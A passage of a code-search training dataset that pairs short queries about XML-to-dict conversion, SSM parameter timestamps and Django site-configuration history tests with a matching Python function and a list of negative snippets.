isinstance(value, dict) and not isinstance(value, list):\n attributes = \"\"\"%s %s=\"%s\" \"\"\" % (\n attributes, attr, value)\n else:\n content += ResponseHelper.jsonp2xml({attr: value})\n if content:\n ret += \"<%s%s>%s</%s>\" % (tag, attributes, content, tag)\n else:\n ret += \"<%s%s/>\" % (tag, attributes)\n\n # Log the source and destination of the response\n ResponseHelper.log.debug(\"ret object is %s\" % ret.__class__)\n if dump_response:\n ResponseHelper.log.debug(\n \"\\n\\njsonp2xml: %s\\n--->\\n%s \\n\\n\" % (json, ret))\n\n return ret.replace(\"isDir=\\\"True\\\"\", \"isDir=\\\"true\\\"\")",
"def test_xml_exist(xml_parser):\n\n xml_data = xml_parser()\n assert xml_data.get_dict()"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
test xml > dict > xml
|
def test_xml_reconvert(self):
_dict = convert.xml_to_dict(self.xml)
result = convert.dict_to_xml(_dict)
expected = self.xml
self.assertEqual(expected, result)
|
[
"def test_xmldict(self):\n xml = self.xml_data\n from_string = xmldict.xml_to_dict(xml)\n\n d = {'contact': {'fname': 'Joe', 'lname': 'Smith'},\n 'query': {'field': 'ass', 'where': 'ass'}}\n\n from_dict = xmldict.dict_to_xml(d)\n\n # print the dict created from xml string\n termprint('INFO', from_string)\n\n # print the xml string created from dict\n termprint('WARNING', from_dict)",
"def test_xml_exist(xml_parser):\n\n xml_data = xml_parser()\n assert xml_data.get_dict()",
"def test_xmlparser_serialiser(self):\n\n sampletext = \"\"\"<root>\n <doc><name>\"Guido Rossum\"</name><address> \"88 Palo Alto\"</address><phone> \"776985411\"</phone></doc>\n <doc><name>\"John Smith\"</name><address> \"38 Driver Avenue\"</address><phone> \"091234567\"</phone></doc>\n <doc><name>\"Jane Doe\"</name><address> \"17 Waine Street\"</address><phone> \"0494512390\"</phone></doc>\n</root>\n\"\"\" \n self.assertEqual(self.xmlo.serialise(\"./test_input.txt\"), sampletext)\n\n return",
"def test_xml_data_parser(self):\n data = utils.xml_data_parser()\n self.assertIsInstance(data, dict)\n self.assertIsInstance(data.keys()[0], int)\n self.assertEqual(\n data[141], {\n 'name': 'Adam P.',\n 'avatar': 'https://intranet.stxnext.pl/api/images/users/141'\n }\n )",
"def test_export_xml(self):\n pass",
"def test_read_xml_string_to_dict_for_staff(self):\n staff_output = {}\n staff_tag = None\n for element, tag in read_xml_string(self.xml_string, records_tag=['staff'], to_dict=True):\n staff_output = element\n staff_tag = tag\n\n self.assertDictEqual(staff_output, self.expected_output)\n self.assertEqual(staff_tag, 'staff')",
"def test_xmlparser_deserialiser(self):\n sampletext = '\"Guido Rossum\", \"88 Palo Alto\", \"776985411\"' \n self.assertEqual(self.xmlo.deserialise(\"./test_input.xml\")[0].csv(), sampletext)\n return",
"def test_format_experiment_xml(self):\n with open('./tests/mocks/experiment.xml') as experiment:\n experiment = xmltodict.parse(experiment.read())\n\n xml_library = create_xml_library(\n 'Blood', 'b2b0c9ad-1292-43cd-aeed-6b492e67252d', 'Illumina NovaSeq 5000',\n 'd41d8cd98f00b204e9800998ecf8427e', '100, 100', 'GRCh37/hg19', 'e40d8f23-2f59-49b7-bb78-bf9fecc1beeb',\n SECRET, 2, 'b2b0c9ad-1292-43cd-aeed-6b492e67252d.bam')\n\n result = xmltodict.parse(etree.tostring(format_experiment_xml(xml_library)))\n\n self.assertEqual(len(result['EXPERIMENT_SET']), len(experiment['EXPERIMENT_SET']))\n self.assertEqual(len(result['EXPERIMENT_SET']['EXPERIMENT']), len(experiment['EXPERIMENT_SET']['EXPERIMENT']))\n\n result_identifiers = result['EXPERIMENT_SET']['EXPERIMENT']['IDENTIFIERS']\n experiment_identifiers = experiment['EXPERIMENT_SET']['EXPERIMENT']['IDENTIFIERS']\n\n self.assertEqual(len(result_identifiers), len(experiment_identifiers))\n self.assertEqual(\n result_identifiers['SUBMITTER_ID']['@namespace'], experiment_identifiers['SUBMITTER_ID']['@namespace'])\n self.assertEqual(result_identifiers['SUBMITTER_ID']['#text'], experiment_identifiers['SUBMITTER_ID']['#text'])\n\n self.assertEqual(\n result['EXPERIMENT_SET']['EXPERIMENT']['TITLE'], experiment['EXPERIMENT_SET']['EXPERIMENT']['TITLE'])\n\n self.assertEqual(\n result['EXPERIMENT_SET']['EXPERIMENT']['STUDY_REF']['@accession'],\n experiment['EXPERIMENT_SET']['EXPERIMENT']['STUDY_REF']['@accession'])\n\n result_design = result['EXPERIMENT_SET']['EXPERIMENT']['DESIGN']\n experiment_design = experiment['EXPERIMENT_SET']['EXPERIMENT']['DESIGN']\n\n self.assertEqual(len(result_design), len(experiment_design))\n self.assertEqual(result_design['DESIGN_DESCRIPTION'], experiment_design['DESIGN_DESCRIPTION'])\n self.assertEqual(\n result_design['SAMPLE_DESCRIPTOR']['@refname'], experiment_design['SAMPLE_DESCRIPTOR']['@refname'])\n self.assertEqual(\n result_design['SAMPLE_DESCRIPTOR']['@refcenter'], experiment_design['SAMPLE_DESCRIPTOR']['@refcenter'])\n\n result_design_library_descriptor = result['EXPERIMENT_SET']['EXPERIMENT']['DESIGN']['LIBRARY_DESCRIPTOR']\n experiment_design_library_descriptor = experiment['EXPERIMENT_SET']['EXPERIMENT']['DESIGN']['LIBRARY_DESCRIPTOR']\n\n self.assertEqual(len(result_design_library_descriptor), len(experiment_design_library_descriptor))\n self.assertEqual(\n result_design_library_descriptor['LIBRARY_NAME'], experiment_design_library_descriptor['LIBRARY_NAME'])\n self.assertEqual(\n result_design_library_descriptor['LIBRARY_STRATEGY'],\n experiment_design_library_descriptor['LIBRARY_STRATEGY'])\n self.assertEqual(\n result_design_library_descriptor['LIBRARY_SOURCE'], experiment_design_library_descriptor['LIBRARY_SOURCE'])\n self.assertEqual(\n result_design_library_descriptor['LIBRARY_SELECTION'],\n experiment_design_library_descriptor['LIBRARY_SELECTION'])\n self.assertEqual(\n result_design_library_descriptor['LIBRARY_LAYOUT'], experiment_design_library_descriptor['LIBRARY_LAYOUT'])\n\n result_design_spot_descriptor = result['EXPERIMENT_SET']['EXPERIMENT']['DESIGN']['SPOT_DESCRIPTOR']\n experiment_design_spot_descriptor = experiment['EXPERIMENT_SET']['EXPERIMENT']['DESIGN']['SPOT_DESCRIPTOR']\n\n self.assertEqual(\n result_design_spot_descriptor['SPOT_DECODE_SPEC']['SPOT_LENGTH'],\n experiment_design_spot_descriptor['SPOT_DECODE_SPEC']['SPOT_LENGTH'])\n\n self.assertEqual(\n result_design_spot_descriptor['SPOT_DECODE_SPEC']['READ_SPEC'][0]['READ_INDEX'],\n experiment_design_spot_descriptor['SPOT_DECODE_SPEC']['READ_SPEC'][0]['READ_INDEX'])\n self.assertEqual(\n result_design_spot_descriptor['SPOT_DECODE_SPEC']['READ_SPEC'][0]['READ_CLASS'],\n experiment_design_spot_descriptor['SPOT_DECODE_SPEC']['READ_SPEC'][0]['READ_CLASS'])\n self.assertEqual(\n result_design_spot_descriptor['SPOT_DECODE_SPEC']['READ_SPEC'][0]['READ_TYPE'],\n experiment_design_spot_descriptor['SPOT_DECODE_SPEC']['READ_SPEC'][0]['READ_TYPE'])\n self.assertEqual(\n result_design_spot_descriptor['SPOT_DECODE_SPEC']['READ_SPEC'][0]['BASE_COORD'],\n experiment_design_spot_descriptor['SPOT_DECODE_SPEC']['READ_SPEC'][0]['BASE_COORD'])\n\n self.assertEqual(\n result_design_spot_descriptor['SPOT_DECODE_SPEC']['READ_SPEC'][1]['READ_INDEX'],\n experiment_design_spot_descriptor['SPOT_DECODE_SPEC']['READ_SPEC'][1]['READ_INDEX'])\n self.assertEqual(\n result_design_spot_descriptor['SPOT_DECODE_SPEC']['READ_SPEC'][1]['READ_CLASS'],\n experiment_design_spot_descriptor['SPOT_DECODE_SPEC']['READ_SPEC'][1]['READ_CLASS'])\n self.assertEqual(\n result_design_spot_descriptor['SPOT_DECODE_SPEC']['READ_SPEC'][1]['READ_TYPE'],\n experiment_design_spot_descriptor['SPOT_DECODE_SPEC']['READ_SPEC'][1]['READ_TYPE'])\n self.assertEqual(\n result_design_spot_descriptor['SPOT_DECODE_SPEC']['READ_SPEC'][1]['BASE_COORD'],\n experiment_design_spot_descriptor['SPOT_DECODE_SPEC']['READ_SPEC'][1]['BASE_COORD'])\n\n result_platform = result['EXPERIMENT_SET']['EXPERIMENT']['PLATFORM']\n experiment_platform = experiment['EXPERIMENT_SET']['EXPERIMENT']['PLATFORM']\n\n self.assertEqual(len(result_platform), len(experiment_platform))\n self.assertEqual(\n result_platform['ILLUMINA']['INSTRUMENT_MODEL'], experiment_platform['ILLUMINA']['INSTRUMENT_MODEL'])\n\n result_experiment_attributes = result['EXPERIMENT_SET']['EXPERIMENT']['EXPERIMENT_ATTRIBUTES']\n experiment_experiment_attributes = experiment['EXPERIMENT_SET']['EXPERIMENT']['EXPERIMENT_ATTRIBUTES']\n\n self.assertEqual(len(result_experiment_attributes), len(experiment_experiment_attributes))\n self.assertEqual(\n len(result_experiment_attributes['EXPERIMENT_ATTRIBUTE']),\n len(experiment_experiment_attributes['EXPERIMENT_ATTRIBUTE']))\n self.assertEqual(\n result_experiment_attributes['EXPERIMENT_ATTRIBUTE']['TAG'],\n experiment_experiment_attributes['EXPERIMENT_ATTRIBUTE']['TAG'])\n self.assertEqual(\n result_experiment_attributes['EXPERIMENT_ATTRIBUTE']['VALUE'],\n experiment_experiment_attributes['EXPERIMENT_ATTRIBUTE']['VALUE'])",
"def test_export_xml_to_file(self):\n pass",
"def eval_xml(xml_string):\n result_dict = {}\n provisional_references_dict = {}\n # Parse XML string\n doc = ET.fromstring(xml_string)\n # List containing the relevant tags\n tags = ['doknr', 'ecli', 'gertyp', 'gerort', 'spruchkoerper', 'entsch-datum', 'aktenzeichen', 'doktyp', 'norm', 'vorinstanz', 'gruende', 'entscheidungsgruende', 'identifier', 'sonstlt', 'abwmeinung', 'tatbestand', 'tenor', 'sonstosatz', 'leitsatz', 'titelzeile', 'mitwirkung', 'region']\n tags_translation = {'doknr': 'documentnumber',\n 'ecli': 'ecli',\n 'gertyp': 'court',\n 'gerort': 'courtlocation',\n 'spruchkoerper': 'spruchkoerper',\n 'entsch-datum': 'date',\n 'aktenzeichen': 'filenumber',\n 'doktyp': 'documenttype',\n 'entscheidungsgruende': 'reasonfordecision',\n 'abwmeinung': 'abwmeinung',\n 'sonstosatz': 'miscsentence',\n 'norm': 'norms',\n 'vorinstanz': 'previouscourt',\n 'gruende': 'reasons',\n 'identifier': 'identifier',\n 'sonstlt': 'other',\n 'tatbestand': 'offense',\n 'tenor': 'tenor',\n 'leitsatz': 'keysentence',\n 'titelzeile': 'title',\n 'mitwirkung': 'mitwirkung',\n 'region': 'region'}\n\n # Load each tag into dictionary:\n\n outgoing_references_dict = {} # Contains additional information about where the references are\n outgoing_references_set = set() # Contains only the referenced filenumbers\n for tag in tags:\n tag_array = [] # Contains child-tags\n # Iterate through child tags of a tag:\n for child in doc.find(tag).iter():\n if child.text and child.text.rstrip() != \"\":\n if tag == 'entsch-datum':\n tag_array.append(int(child.text)) # Append child date to array as int\n else:\n tag_array.append(child.text.strip()) # Append child tag to array\n # If the array only contains one element, or the tag doesn't have child-tags,\n # only load that tag into the directory. Array is empty if there is no value inside the tag:\n if len(tag_array) == 1:\n if tag == 'vorinstanz':\n outgoing_references, outgoing_references_set = ref.find_reference(tag_array, outgoing_references_set)\n #outgoing_references_dict.append(outgoing_references)\n outgoing_references_dict[tag] = outgoing_references\n # Enter Data into the correct translated dict entry\n result_dict[tags_translation[tag]] = tag_array[0]\n else:\n # Specific tags require search for references\n # This path also enters any tags that are contained in arrays\n reference_tags = ['gruende', 'tenor', 'entscheidungsgruende', 'tatbestand', 'leitsatz', 'vorinstanz']\n if tag in reference_tags:\n outgoing_references, outgoing_references_set = ref.find_reference(tag_array, outgoing_references_set)\n # outgoing_references_dict.append(outgoing_references)\n outgoing_references_dict[tag] = outgoing_references #todo tags_translation?\n result_dict[tags_translation[tag]] = tag_array\n\n result_dict['keywords'] = []\n result_dict['incoming_count'] = -1\n result_dict['successful'] = \"\"\n\n # build provisional reference-dict for ES that does not contain incoming references yet:\n provisional_references_dict = create_reference_dict(result_dict['filenumber'], outgoing_references_dict, outgoing_references_set, [], result_dict['documentnumber'])\n # ES fields: [ID][filenumber][list outgoing references][set outgoing references][set incoming references]\n # [sum of incoming references]\n\n return result_dict, provisional_references_dict",
"def test_format_submission_xml(self):\n with open('./tests/mocks/submission.xml') as submission:\n submission = xmltodict.parse(submission.read())\n\n xml_library = create_xml_library(\n 'Blood', 'b2b0c9ad-1292-43cd-aeed-6b492e67252d', 'Illumina NovaSeq 5000',\n 'd41d8cd98f00b204e9800998ecf8427e', '100, 100', 'GRCh37/hg19', 'e40d8f23-2f59-49b7-bb78-bf9fecc1beeb',\n SECRET, 2, 'b2b0c9ad-1292-43cd-aeed-6b492e67252d.bam')\n\n result = xmltodict.parse(etree.tostring(format_submission_xml(xml_library)))\n\n self.assertEqual(result['SUBMISSION']['@alias'], submission['SUBMISSION']['@alias'])\n self.assertEqual(result['SUBMISSION']['@center_name'], submission['SUBMISSION']['@center_name'])\n self.assertEqual(\n result['SUBMISSION']['@xsi:noNamespaceSchemaLocation'],\n submission['SUBMISSION']['@xsi:noNamespaceSchemaLocation'])\n self.assertEqual(result['SUBMISSION']['@xmlns:xsi'], submission['SUBMISSION']['@xmlns:xsi'])\n\n result_contacts = result['SUBMISSION']['CONTACTS']\n submission_contacts = submission['SUBMISSION']['CONTACTS']\n\n self.assertEqual(len(result_contacts), len(submission_contacts))\n self.assertEqual(result_contacts['CONTACT'][0]['@name'], submission_contacts['CONTACT'][0]['@name'])\n self.assertEqual(\n result_contacts['CONTACT'][0]['@inform_on_error'], submission_contacts['CONTACT'][0]['@inform_on_error'])\n self.assertEqual(\n result_contacts['CONTACT'][0]['@inform_on_status'], submission_contacts['CONTACT'][0]['@inform_on_status'])\n self.assertEqual(result_contacts['CONTACT'][1]['@name'], submission_contacts['CONTACT'][1]['@name'])\n self.assertEqual(\n result_contacts['CONTACT'][1]['@inform_on_error'], submission_contacts['CONTACT'][1]['@inform_on_error'])\n self.assertEqual(\n result_contacts['CONTACT'][1]['@inform_on_status'], submission_contacts['CONTACT'][1]['@inform_on_status'])\n\n result_actions = result['SUBMISSION']['ACTIONS']\n submission_actions = submission['SUBMISSION']['ACTIONS']\n\n self.assertEqual(len(result_actions), len(submission_actions))\n\n self.assertEqual(\n result_actions['ACTION'][0]['ADD']['@source'], submission_actions['ACTION'][0]['ADD']['@source'])\n self.assertEqual(\n result_actions['ACTION'][0]['ADD']['@schema'], submission_actions['ACTION'][0]['ADD']['@schema'])\n self.assertEqual(\n result_actions['ACTION'][1]['ADD']['@source'], submission_actions['ACTION'][1]['ADD']['@source'])\n self.assertEqual(\n result_actions['ACTION'][1]['ADD']['@schema'], submission_actions['ACTION'][1]['ADD']['@schema'])",
"def map_to_xml(mapping, root=None, command=None):\n envelope = None\n\n if root is None:\n envelope, root = get_envelope(command)\n\n for tag, value in mapping:\n tag = ElementTree.Element(tag)\n\n if type(value) == tuple:\n # Allow for nesting.\n value = map_to_xml(value, tag)\n elif type(value) == list:\n # This conditional lets us expand lists into multiple elements with\n # the same name:\n #\n # ((\"test\", ((\"test_child\", [1, 2, 3]),)),)\n #\n # will be serialized as:\n #\n # <test>\n # <test_child>1</test_child>\n # <test_child>2</test_child>\n # <test_child>3</test_child>\n # </test>\n value_list = tuple((tag.tag, value) for value in value)\n value = map_to_xml(value_list, root)\n continue\n elif type(value) == dict:\n # This conditional expands dicts into name/value pairs, as required\n # by some Silverpop method:\n #\n # ((\"COLUMN\", {\"a\": 1}),)\n #\n # will be serialized as:\n #\n # <COLUMN>\n # <NAME>a</NAME>\n # <VALUE>1</VALUE>\n # </COLUMN>\n value_list = ()\n for column_name, column_value in six.iteritems(value):\n value_list += (((tag.tag), ((\"NAME\", column_name), (\"VALUE\", column_value))),)\n\n value = map_to_xml(value_list, root)\n continue\n\n elif not type(value) == bool:\n # If the value isn't True/False, we can set the node's text value.\n # If the value is True, the tag will still be appended but will be\n # self-closing.\n tag.text = u\"%s\" % (value)\n\n if value:\n root.append(tag)\n\n if envelope is not None:\n root = envelope\n return ElementTree.tostring(root)",
"def test_01_FindXml(self):\r\n self.assertEqual(self.m_xml.root.tag, 'PyHouse', 'Invalid XML - not a PyHouse XML config file')",
"def _dict_to_etree_rec(self, content, tree):\n if type(content) == dict:\n for key, value in content.items():\n e = ElementTree.Element(key)\n self._dict_to_etree_rec(value, e)\n tree.append(e)\n else:\n tree.text = str(content)",
"def ConvertXmlToDict(root, dictclass=XmlDictObject):\r\n\r\n # If a string is passed in, try to open it as a file\r\n if isinstance(root, str):\r\n import io\r\n \r\n root = io.StringIO(root)\r\n root = ElementTree.parse(root).getroot()\r\n elif not ElementTree.iselement(root):\r\n print('Expected ElementTree.Element or file path string')\r\n\r\n return dictclass({root.tag: _ConvertXmlToDictRecurse(root, dictclass)})",
"def _dict_to_etree_rec(self, content, tree):\n if type(content) == dict:\n for key, value in content.items():\n element = ElementTree.Element(key)\n self._dict_to_etree_rec(value, element)\n tree.append(element)\n else:\n tree.text = str(content)",
"def dict_to_xml(tag, d):\r\n elem = Element(tag)\r\n for key, val in d.items():\r\n child = Element(key)\r\n child.text = str(val)\r\n elem.append(child)\r\n return elem",
"def test_read_xml_string_to_dict_for_employees(self):\n employees_output = []\n\n for element, tag in read_xml_string(self.xml_string, records_tag=['employees'], to_dict=True):\n if tag == \"employees\":\n employees_output.append(element['bio'])\n\n self.assertListEqual(employees_output, self.expected_output['operations_department']['employees'])",
"def test_string_roundtrip(self):\n block = self.create_block(\"leafwithdictandlist\")\n\n expected_seq = [b'1', b'2']\n expected_dict = {b'1': b'1', b'ping': b'ack'}\n block.sequence = expected_seq\n block.dictionary = expected_dict\n self.assertRaises(TypeError, self.export_xml_for_block, block)",
"def getxmlfromDictionary(dictionary, xml_element):\n xml_element.set(\"Entropy\", str(dictionary[\"Entropy\"]))\n xml_element.set(\"Classes\", dictionary[\"classification_data\"])\n del dictionary[\"Entropy\"]\n del dictionary[\"classification_data\"]\n if 'classifier' not in dictionary:\n for key in dictionary:\n for i in dictionary[key]:\n elem = ET.SubElement(xml_element, \"node\")\n elem.set(key, i)\n getxmlfromDictionary(dictionary[key][i], elem) \n else:\n xml_element.text = dictionary['classifier']\n return"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Get the timestamp currrently stored in the SSM parameter.
|
def get_timestamp(self):
param = self.client.get_parameter(Name=self.param_name)
timestamp = param['Parameter']['Value']
return timestamp
|
[
"def timestamp(self) -> datetime:\n return self.context['embryo'].get('timestamp')",
"def _get_timestamp(self):\n return datetime.datetime.now()",
"def timestamp(self) -> Decimal:\n return self.__dict__[\"timestamp\"]",
"def timestamp(self) -> int:\n return self.summary[\"timestamp\"]",
"def timestamp(self):\n if self.service.backtesting:\n return self._timestamp\n else:\n return time.time()",
"def get_timestamp():\n\ttimestamp = datetime.datetime.now().strftime('%Y%m%d%H%M%S%f')\n\tsleep(10e-6) # This ensures that there will not exist two equal timestamps.\n\treturn timestamp",
"def current_timestamp():\n # return \"%d-%02d-%02dT%02d:%02d:%02dZ\" % utime.localtime()[:6]\n return utime.time()",
"def get_sensor_timestamp(self, sensorname):\n _, _, timestamp = self.get_sensor(sensorname)\n return timestamp",
"def setpoint_ts(self):\n return self._metadata[\"setpoint_timestamp\"]",
"def timestamp_sec(self):\n return _raw_util.raw_message_sptr_timestamp_sec(self)",
"def time(self):\n err=Ntptime.ntptime_shm_getlastts(self.cont, self.t)\n if (err!=0):\n raise Exception(\"can't get last ts, err - \" + str(err))\n\n return Ntptime.ntptime_to_u64(self.t)",
"def get_timestamp(use_timestamp):\n if not use_timestamp:\n return ''\n else:\n timestamp = datetime.now()\n timestamp = '_{}_{}_{}_{}_{}'.format(\n timestamp.month, timestamp.day, timestamp.hour,\n timestamp.minute, timestamp.second)\n return timestamp",
"def unix_timestamp(self):\n for cycle in self.cycles:\n return cycle.get('time')\n return None",
"def timestamp(self):\n def get_tstp(y, mo, d, h, mi, s):\n ts = time.strptime(str(y) + '-' + str(mo) + '-' + str(d) + 'T' + str(h) + ':' + \\\n str(mi) + ':' + str(s), '%Y-%m-%dT%H:%M:%S')\n return time.mktime(ts)\n y = 1970\n mo = 1\n d = 1\n h = 0\n mi = 0\n s = 0\n # syntacic hack - 'while' stmt is not important, but 'break' makes there goto stmt\n while 1:\n if self._content['year'] is None: break\n y = self._content['year']\n if self._content['month'] is None: break\n mo = self._content['month']\n if self._content['day'] is None: break\n d = self._content['day']\n if self._content['hour'] is None: break\n h = self._content['hour']\n if self._content['minute'] is None: break\n mi = self._content['minute']\n if self._content['second'] is None: break\n s = self._content['second']\n break\n if y < 1970: return 0.0\n return get_tstp(y, mo, d, h, mi, s)",
"def last_key_generation_timestamp(self) -> Optional[str]:\n return pulumi.get(self, \"last_key_generation_timestamp\")",
"def timestamp(self,item):\n try:\n self._timestamp[item]\n except:\n self._timestamp[item] = time.time()\n return self._timestamp[item]",
"def get_last_timestamp(self):\n if self.halo_module == \"scans\":\n url = \"/v1/scans?sort_by=created_at.desc&per_page=1\"\n elif self.halo_module == \"events\":\n url = \"/v1/events?sort_by=created_at.desc&per_page=1\"\n else:\n print(\"Unrecognized module: %s\" % self.halo_module)\n session = cloudpassage.HaloSession(self.halo_key,\n self.halo_secret,\n api_host=self.halo_api_hostname,\n integration_string=self.integration_name)\n http_helper = cloudpassage.HttpHelper(session)\n timestamp = http_helper.get(url)[self.halo_module][0][\"created_at\"]\n return timestamp",
"def bootstrapped_timestamp(self):\n\n return self._bootstrapped_timestamp.value",
"def getDateTime(self):\n\n return self.__timeStamp",
"def get_physical_time():\n return datetime.now().timestamp()"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Test that and entry is added to SiteConfigurationHistory model each time a new SiteConfiguration is added.
|
def test_site_configuration_post_save_receiver(self):
# add SiteConfiguration to database
site_configuration = SiteConfigurationFactory.create(
site=self.site,
)
# Verify an entry to SiteConfigurationHistory was added.
site_configuration_history = SiteConfigurationHistory.objects.filter(
site=site_configuration.site,
).all()
# Make sure an entry (and only one entry) is saved for SiteConfiguration
assert len(site_configuration_history) == 1
|
[
"def test_site_configuration_post_update_receiver(self):\n # add SiteConfiguration to database\n site_configuration = SiteConfigurationFactory.create(\n site=self.site,\n )\n\n site_configuration.site_values = {'test': 'test'}\n site_configuration.save()\n\n # Verify an entry to SiteConfigurationHistory was added.\n site_configuration_history = SiteConfigurationHistory.objects.filter(\n site=site_configuration.site,\n ).all()\n\n # Make sure two entries (one for create and one for update) are saved for SiteConfiguration\n assert len(site_configuration_history) == 2",
"def test_no_entry_is_saved_for_errors(self):\n # add SiteConfiguration to database\n site_configuration = SiteConfigurationFactory.create(\n site=self.site,\n )\n\n # Verify an entry to SiteConfigurationHistory was added.\n site_configuration_history = SiteConfigurationHistory.objects.filter(\n site=site_configuration.site,\n ).all()\n\n # Make sure entry is saved if there is no error\n assert len(site_configuration_history) == 1\n\n with transaction.atomic():\n with pytest.raises(IntegrityError):\n # try to add a duplicate entry\n site_configuration = SiteConfigurationFactory.create(\n site=self.site,\n )\n site_configuration_history = SiteConfigurationHistory.objects.filter(\n site=site_configuration.site,\n ).all()\n\n # Make sure no entry is saved if there an error\n assert len(site_configuration_history) == 1",
"def test_site_configuration_post_update_receiver_with_skip(self):\n # Add SiteConfiguration to database. By default, the site_valutes field contains only \"{}\".\n site_configuration = SiteConfigurationFactory.create(\n site=self.site,\n )\n\n # Update the SiteConfiguration we just created.\n site_configuration.site_values = {\"test\": \"test\"}\n save_siteconfig_without_historical_record(site_configuration) # Instead of .save().\n\n # Verify that the SiteConfiguration has been updated.\n assert site_configuration.get_value('test') == 'test'\n\n # Verify an entry to SiteConfigurationHistory was NOT added.\n # Make sure one entry (one for create and NONE for update) is saved for SiteConfiguration.\n site_configuration_history = SiteConfigurationHistory.objects.filter(\n site=site_configuration.site,\n ).all()\n assert len(site_configuration_history) == 1",
"def added(self, configuration):",
"def test_update_history_using_put(self):\n pass",
"def testBacklogCreation(self):\n global_backlog = BacklogConfiguration(self.env, name=\"Global Backlog\")\n global_backlog.ticket_types = [Type.REQUIREMENT]\n global_backlog.save()\n # Now reload the same backlog and check that the type and order are kept\n b1 = self.bmm.get(name=\"Global Backlog\")\n self.assert_equals(b1.ticket_types, [Type.REQUIREMENT])",
"def test_site_configuration_has_changed(self):\n # The database configuration timestamp is initialized as part\n # of the default data. In that case, it happened during the\n # package_setup() for this test run.\n last_update = Configuration.site_configuration_last_update(self._db)\n\n def ts():\n return Timestamp.value(\n self._db, Configuration.SITE_CONFIGURATION_CHANGED,\n service_type=None, collection=None\n )\n timestamp_value = ts()\n eq_(timestamp_value, last_update)\n\n # Now let's call site_configuration_has_changed().\n #\n # Sending cooldown=0 ensures we can change the timestamp value\n # even though it changed less than one second ago.\n time_of_update = datetime.datetime.utcnow()\n site_configuration_has_changed(self._db, cooldown=0)\n\n # The Timestamp has changed in the database.\n assert ts() > timestamp_value\n\n # The locally-stored last update value has been updated.\n new_last_update_time = Configuration.site_configuration_last_update(\n self._db, timeout=0\n )\n assert new_last_update_time > last_update\n assert (new_last_update_time - time_of_update).total_seconds() < 1\n\n # Let's be sneaky and update the timestamp directly,\n # without calling site_configuration_has_changed(). This\n # simulates another process on a different machine calling\n # site_configuration_has_changed() -- they will know about the\n # change but we won't be informed.\n timestamp = Timestamp.stamp(\n self._db, Configuration.SITE_CONFIGURATION_CHANGED,\n service_type=None, collection=None\n )\n\n # Calling Configuration.check_for_site_configuration_update\n # with a timeout doesn't detect the change.\n eq_(new_last_update_time,\n Configuration.site_configuration_last_update(self._db, timeout=60)\n )\n\n # But the default behavior -- a timeout of zero -- forces\n # the method to go to the database and find the correct\n # answer.\n newer_update = Configuration.site_configuration_last_update(\n self._db\n )\n assert newer_update > last_update\n\n # The Timestamp that tracks the last configuration update has\n # a cooldown; the default cooldown is 1 second. This means the\n # last update time will only be set once per second, to avoid\n # spamming the Timestamp with updates.\n\n # It's been less than one second since we updated the timeout\n # (with the Timestamp.stamp call). If this call decided that\n # the cooldown had expired, it would try to update the\n # Timestamp, and the code would crash because we're passing in\n # None instead of a database connection.\n #\n # But it knows the cooldown has not expired, so nothing\n # happens.\n site_configuration_has_changed(None)\n\n # Verify that the Timestamp has not changed (how could it,\n # with no database connection to modify the Timestamp?)\n eq_(newer_update,\n Configuration.site_configuration_last_update(self._db))",
"def test_application_audit_creation():\n instance1 = ApplicationHistory(id=1, application_id=10, application_status=\"New\",\n form_url=\"https://testsample.com/api/form/6100fae7ba5ac0627e9eefe6/submission/6101131fc325d44c1d846c13\")\n assert instance1.id == 1\n assert instance1.form_url == \"https://testsample.com/api/form/6100fae7ba5ac0627e9eefe6/submission/6101131fc325d44c1d846c13\"",
"def test_history_get(self):\n # the NewsLink is created in setUpTestData\n with self.login(self.test_user):\n self.get_check_200(\n \"admin:organizer_newslink_history\",\n object_id=self.nl1_pk,\n )",
"def test_add_current_list_to_history():\r\n\r\n participants = initialise_participants_dictionary()\r\n add_current_list_to_history(participants)\r\n\r\n history = get_history_list(participants)\r\n\r\n assert len(history) == 1",
"def test_get_strategy_history(self):\n pass",
"def test_add_configuration(self):\n # create an instance of the API class\n api_instance = swagger_client.ConfigurationApi(\n swagger_client.ApiClient())\n\n cfg = SAMPLE_CFG\n\n # Start monitoring response time\n start = time.clock()\n # Add a new test configuration\n api_instance.add_configuration(cfg)\n request_time = time.clock() - start\n # End monitoring response time\n\n self.assertLessEqual(request_time,\n API_MAX_ALLOWED_RESPONSE_TIME,\n \"Request completed in {}ms\".format(request_time))",
"def test_create_history_using_post(self):\n pass",
"def test_config_put(self):\n pass",
"def test_add_business_activity(self):\n pass",
"def test_add(self):\n\n p = Person(first_name='John',\n last_name='Doe',\n email='john@doe.com',\n birth_date=datetime.now())\n p.save()\n logs = ModelChange.objects.filter(instance_pk=p.pk)\n self.assertTrue(logs.exists())\n self.assertEqual(logs.first().type, 'add')",
"def test_share_configuration_link_duplicate_element(self):\n\n luke = User(\n **{\n 'email': 'lake@skywalker.io',\n 'first_name': 'Luke',\n 'last_name': 'Skywalker'\n }\n )\n luke.set_password('NeverJoinYou')\n luke.verified = True\n luke.save()\n\n alloy_store = deepcopy(ALLOY_STORE)\n alloy_store['alloys']['parent']['compositions'].append(\n {\n 'symbol': 'C',\n 'weight': 12.02\n }\n )\n\n with self.client as client:\n test_login(client, luke.email, 'NeverJoinYou')\n resp = client.post(\n '/v1/sim/user/share/simulation/link',\n data=json.dumps(\n {\n 'configurations': CONFIGS,\n 'alloy_store': alloy_store,\n 'simulation_results': SIMULATION_RESULTS\n }\n ),\n content_type='application/json'\n )\n\n data = json.loads(resp.data.decode())\n self.assertEqual(resp.status_code, 400)\n self.assertEqual(data['status'], 'fail')\n self.assertEqual(\n data['message'], 'Alloy contains duplicate elements.'\n )",
"def test_game_event():\n\n event = events.get(1)\n game = games.get(1)\n\n event.games.append(game)\n\n assert game in event.games",
"def setUp(self):\n reversion.register(Site)\n with reversion.revision:\n site = Site.objects.create(name=\"site\", domain=\"www.site-rev-1.com\")\n with reversion.revision:\n site.domain = \"www.site-rev-2.com\"\n site.save()\n self.site = site"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Test that and entry is added to SiteConfigurationHistory each time a SiteConfiguration is updated.
|
def test_site_configuration_post_update_receiver(self):
# add SiteConfiguration to database
